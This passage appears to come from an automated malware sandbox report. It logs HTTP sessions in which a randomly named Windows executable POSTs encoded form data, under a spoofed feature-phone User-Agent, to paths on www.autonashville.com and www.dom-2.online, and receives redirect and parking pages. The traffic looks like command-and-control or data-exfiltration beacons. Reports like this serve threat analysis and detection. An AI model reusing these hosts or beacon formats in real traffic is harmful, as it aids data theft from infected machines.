                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 77 47 78 41 46 52 55 64 6d 62 4a 2b 76 76 78 56 31 6f 6b 51 58 6c 6e 6b 61 4c 72 54 66 72 42 50 51 4d 79 62 55 59 73 41 57 7a 30 74 75 52 4d 37 7a 61 56 53 45 37 52 68 7a 4a 4d 32 62 69 6a 33 45 4e 78 32 39 65 6a 6c 79 4b 59 31 71 2f 4e 49 62 72 31 35 63 6c 59 71 79 39 44 2b 48 53 55 58 74 31 66 4e 73 4d 70 46 67 59 56 37 39 31 76 56 37 51 68 39 69 7a 6f 4a 52 51 2f 41 63 59 42 63 32 59 34 35 79 72 55 32 54 56 46 50 31 41 76 4a 2b 51 47 71 58 30 4b 44 78 6b 52 66 52 48 4c 79 54 44 66 65 56 6f 46 42 78 45 41 4d 77 3d
                      Data Ascii: MtXH8dRH=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6jwGxAFRUdmbJ+vvxV1okQXlnkaLrTfrBPQMybUYsAWz0tuRM7zaVSE7RhzJM2bij3ENx29ejlyKY1q/NIbr15clYqy9D+HSUXt1fNsMpFgYV791vV7Qh9izoJRQ/AcYBc2Y45yrU2TVFP1AvJ+QGqX0KDxkRfRHLyTDfeVoFBxEAMw=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.4504203.33.130.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:44.726350069 CEST10859OUTPOST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 34 47 78 31 5a 52 55 36 4b 62 49 2b 76 76 2b 46 31 6c 6b 51 57 35 6e 6b 53 48 72 54 54 37 42 4e 59 4d 7a 36 30 59 38 68 57 7a 39 74 75 52 4f 37 7a 58 62 79 45 75 52 68 6a 4e 4d 32 4c 69 6a 33 45 4e 78 30 6c 65 67 77 47 4b 65 31 71 38 48 6f 62 6e 2f 5a 64 4d 59 75 6d 48 44 2b 7a 6b 56 6d 4e 31 66 74 38 4d 36 48 59 59 54 72 39 7a 73 56 36 44 68 39 6d 53 6f 4e 49 76 2f 41 6f 68 42 65 71 59 36 39 6d 38 4d 32 58 4e 5a 75 46 62 2f 4a 75 50 4f 35 76 71 4d 68 68 6e 48 4b 4e 70 58 43 48 63 51 35 67 4d 41 43 70 48 66 6f 45 4b 73 2b 51 56 4b 32 75 70 71 66 6c 4a 73 53 69 6b 64 71 4a 51 75 6d 39 67 43 6d 6e 44 57 65 56 2f 2b 4a 4a 7a 4f 46 41 68 66 62 4a 37 41 34 71 38 65 32 6f 6a 57 78 39 48 6a 2b 65 74 4a 56 6a 67 73 4a 72 2b 7a 57 4a 4e 6b 30 48 30 55 69 57 55 55 37 68 6d 6a 71 6e 35 59 6e 35 6e 55 2b 54 6c 69 59 4b 69 5a 57 43 2f 65 4f 76 79 64 71 43 4b 30 [TRUNCATED]
                      Data Ascii: MtXH8dRH=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6j4Gx1ZRU6KbI+vv+F1lkQW5nkSHrTT7BNYMz60Y8hWz9tuRO7zXbyEuRhjNM2Lij3ENx0legwGKe1q8Hobn/ZdMYumHD+zkVmN1ft8M6HYYTr9zsV6Dh9mSoNIv/AohBeqY69m8M2XNZuFb/JuPO5vqMhhnHKNpXCHcQ5gMACpHfoEKs+QVK2upqflJsSikdqJQum9gCmnDWeV/+JJzOFAhfbJ7A4q8e2ojWx9Hj+etJVjgsJr+zWJNk0H0UiWUU7hmjqn5Yn5nU+TliYKiZWC/eOvydqCK0E+Ec72HouXSvNmrbRz0KtT1AhTVGVt58rgbDb+f6MnYF5nZxSPAPx+0QVznZ0GZ01jO//2Ugc+HolWqirDdcawoN4uhTI06xUz7lZldNZvI45sSJ8lRLe8JcnXqxVs/zbn8Lu6yL0hxQm50AunbpOJ63IPCOb2xOQI0JNhmcx8Tx4ZYxY3lvJmeSvAa+bI4VfrkiVjpeLM7IT+WulvjxHgJKOKWU8gCDqNG/tmlTS/TCAoiVv3AICXbgo+WuCFyeOvjf5M0Ngqy1hkem//ng6OelVRBwNmCQetwq2fnyvzXrxV2AkKzoF85nkQpq0osJaUBe0Lx5c/8fGfNmQ/Rmrb5iPeIO1QQvcqtde+6tMguzrdS5TWOJCdplZ5EvnRo0Zk0qzTb1WUdfyaMPOdPg4VScEbz8kzXUnIocWrZA7wh7gNRLT4PB7wgCco+tizhGrltealFS6DGwHeMQt2gQ/Be9OBNSsBkLn5bCVdHSJQNh/UyndoW9MTthk5CpKDOkTR70H7zx1sAhiXSuh3u8E6fNLP5koQo1aCEzGzVfJag+82tcNkcNikViwCQVv6AgLLSs8n3ps6S1oXPccP026ge/QtY4ZsNnD11mpwm2DsxtoRZue/8oRkDSRidQaLPaiDdQwMbNrklmYdFP9/H/XD/o4if2kmf9bD [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.4504213.33.130.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:47.273588896 CEST487OUTGET /7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.autonashville.com
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:47.744946957 CEST400INHTTP/1.1 200 OK
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:28:47 GMT
                      Content-Type: text/html
                      Content-Length: 260
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 74 58 48 38 64 52 48 3d 78 6d 49 4f 46 42 69 58 56 72 30 2f 51 69 42 74 6c 66 70 70 79 63 70 36 39 67 34 67 49 4b 76 2f 6c 4e 7a 55 66 37 76 43 38 7a 63 45 30 6e 46 69 59 5a 53 32 4c 4d 2b 32 33 32 67 70 75 7a 36 38 6c 6c 58 66 6a 41 33 35 42 72 6f 49 37 36 67 45 6d 69 65 66 38 70 53 7a 42 4b 33 5a 56 54 38 65 66 7a 58 6a 4c 67 62 69 6a 56 41 41 35 6e 55 6b 73 51 75 64 49 77 30 3d 26 45 42 30 34 54 3d 30 68 53 54 46 38 70 68 77 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw"}</script></head></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.450422199.59.243.226803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:00.973885059 CEST742OUTPOST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 68 54 56 75 74 54 48 56 35 4e 45 4d 76 30 5a 30 35 78 4a 4b 70 6c 75 49 68 38 7a 68 74 51 33 65 6a 52 63 55 43 6d 6d 74 67 72 71 2b 78 58 4f 6a 77 76 30 47 6f 71 67 59 46 50 75 4d 35 57 52 44 4b 6d 6e 62 58 38 37 2b 4b 56 74 35 4e 79 2b 6a 4e 43 66 49 45 33 42 6f 79 48 69 30 55 75 55 38 48 75 4d 52 37 33 45 78 39 59 4b 48 7a 4d 70 43 4e 73 34 6f 52 70 57 6d 71 61 6c 6f 71 5a 7a 46 79 57 4a 62 63 65 6d 33 69 70 66 4b 6c 32 57 52 56 47 7a 67 67 74 2f 71 72 77 31 4a 47 7a 45 52 41 76 77 71 52 30 53 31 4f 2b 56 56 58 59 73 61 4f 52 62 6c 73 77 3d 3d
                      Data Ascii: MtXH8dRH=ii7XstaMoFqjhTVutTHV5NEMv0Z05xJKpluIh8zhtQ3ejRcUCmmtgrq+xXOjwv0GoqgYFPuM5WRDKmnbX87+KVt5Ny+jNCfIE3BoyHi0UuU8HuMR73Ex9YKHzMpCNs4oRpWmqaloqZzFyWJbcem3ipfKl2WRVGzggt/qrw1JGzERAvwqR0S1O+VVXYsaORblsw==
                      Sep 13, 2024 12:29:01.457920074 CEST1236INHTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:01 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 212ee7de-d814-4b98-9aeb-6bd8cfa5d0f5
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=212ee7de-d814-4b98-9aeb-6bd8cfa5d0f5; expires=Fri, 13 Sep 2024 10:44:01 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:01.458409071 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjEyZWU3ZGUtZDgxNC00Yjk4LTlhZWItNmJkOGNmYTVkMGY1IiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.450423199.59.243.226803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:03.568825006 CEST762OUTPOST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 6a 65 6a 30 67 55 42 6a 61 74 6c 72 71 2b 6c 6e 4f 6d 2b 50 30 33 6f 71 63 36 46 50 69 4d 35 57 56 44 4b 6e 58 62 58 50 54 39 4c 46 73 66 42 53 2f 6c 4a 43 66 49 45 33 42 6f 79 47 53 65 55 75 63 38 48 65 51 52 36 57 45 77 7a 34 4b 47 79 4d 70 43 61 38 34 7a 52 70 57 55 71 62 35 4f 71 62 37 46 79 58 5a 62 64 4c 4b 30 6f 70 65 67 68 32 57 47 57 33 61 72 74 74 75 74 30 43 78 75 4e 51 63 54 42 70 68 77 41 46 7a 69 63 2b 78 6d 4b 66 6c 75 44 53 6d 73 33 35 70 53 71 73 37 57 54 50 52 68 6e 76 61 34 6a 57 78 33 64 56 73 3d
                      Data Ascii: MtXH8dRH=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtijej0gUBjatlrq+lnOm+P03oqc6FPiM5WVDKnXbXPT9LFsfBS/lJCfIE3BoyGSeUuc8HeQR6WEwz4KGyMpCa84zRpWUqb5Oqb7FyXZbdLK0opegh2WGW3arttut0CxuNQcTBphwAFzic+xmKfluDSms35pSqs7WTPRhnva4jWx3dVs=
                      Sep 13, 2024 12:29:04.037043095 CEST1236INHTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:03 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 521b59ae-b183-4f2e-b5d3-3454b5fa009d
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=521b59ae-b183-4f2e-b5d3-3454b5fa009d; expires=Fri, 13 Sep 2024 10:44:03 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:04.037086010 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTIxYjU5YWUtYjE4My00ZjJlLWI1ZDMtMzQ1NGI1ZmEwMDlkIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.450424199.59.243.226803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:06.139482975 CEST10844OUTPOST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 62 65 6a 42 73 55 54 41 79 74 6d 72 71 2b 35 33 4f 6e 2b 50 30 51 6f 71 45 2b 46 4f 66 37 35 56 39 44 4b 46 66 62 56 2b 54 39 41 46 73 66 63 69 2f 31 4e 43 66 6e 45 32 78 73 79 47 69 65 55 75 63 38 48 66 67 52 39 48 45 77 78 34 4b 48 7a 4d 70 4f 4e 73 35 63 52 74 36 45 71 59 56 34 71 72 62 46 79 33 70 62 52 64 2b 30 79 70 66 47 6d 32 58 44 57 33 47 6b 74 73 43 51 30 44 56 55 4e 57 67 54 44 6f 45 59 62 46 6a 75 47 34 31 70 4b 4e 41 4d 50 54 53 57 35 37 63 76 36 75 58 79 46 2b 55 4f 6d 66 66 61 33 47 64 37 42 79 74 55 55 6a 66 54 34 51 30 50 66 52 55 4f 34 46 73 52 46 61 6b 6d 6d 49 4f 73 56 43 34 2b 41 33 64 67 68 6a 77 63 78 4d 42 75 4f 51 72 58 39 6e 66 53 2b 50 50 36 32 2f 68 4c 53 58 7a 2b 38 37 2f 58 56 4b 53 5a 39 4c 46 78 75 69 4a 47 45 35 34 2b 56 76 67 6e 6f 32 51 41 4c 4d 67 5a 42 4e 70 41 57 4c 38 68 47 4f 33 5a 56 65 53 6c 56 38 78 6f 48 [TRUNCATED]
                      Data Ascii: MtXH8dRH=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtibejBsUTAytmrq+53On+P0QoqE+FOf75V9DKFfbV+T9AFsfci/1NCfnE2xsyGieUuc8HfgR9HEwx4KHzMpONs5cRt6EqYV4qrbFy3pbRd+0ypfGm2XDW3GktsCQ0DVUNWgTDoEYbFjuG41pKNAMPTSW57cv6uXyF+UOmffa3Gd7BytUUjfT4Q0PfRUO4FsRFakmmIOsVC4+A3dghjwcxMBuOQrX9nfS+PP62/hLSXz+87/XVKSZ9LFxuiJGE54+Vvgno2QALMgZBNpAWL8hGO3ZVeSlV8xoHFrI2uZFyFPVS5dOHiSaUD5wH+kLL3/4Fm915hN8FEe5S5YFMovwqKC6myEnzIgWkVCzyEnjFvDyN1M2e2UevzSAjzz6DjmKpggUJr8YPeDE3jUDGyBsvFm/pYMzrgtosi4uotpcHlo9ezHCcMmA6tugbFYOAYjb1N9ij/xZICABny/PwbY42fmpKNyXll+he6RAJz/qQ3SruIj7Lh7anC0XWzjWCYll8X69t8dswP5YohNyK8XGjczY5bVk6i9C6VD1zKRNNekX6/py7DaRCRlsiZe5VEGsmwHl523MRjN/02CCyJHZ8zsRdcFRz60a7q5X/s8Dum6nU7doqBRA3bpXc3VheVIFitqqEmPfO0eiUCwERqD034cb5yB6lwc2gsndk7nVEq5zyrW4EotmP8RioRFGy8WOxMqt/2V37paP7tlxtSfwbRkA4hXGup/fqVPVvddFryPfBoOuL8Jet9DT+aC5kvTZYfn/zwFD60po2o8LZf3FBqg2Pz20e+QPRVlT4Qt5jGA6S9G5DkPNDFPv5I2i3yPAZssleT50OCVgPv4adFLplOhWH/aZ9/HUlFEegn9Y2iPrJS1s12AqRYVJsVKepuNOzC7COiv+0QNCdpr2F7x09IqywDtqNY7Yi1nufth1OD/O+a32e/wAAFUtenJU9Q8cH8l [TRUNCATED]
                      Sep 13, 2024 12:29:06.625369072 CEST1236INHTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:06 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 91606f27-367d-4a06-9820-4cd9b0680512
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=91606f27-367d-4a06-9820-4cd9b0680512; expires=Fri, 13 Sep 2024 10:44:06 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
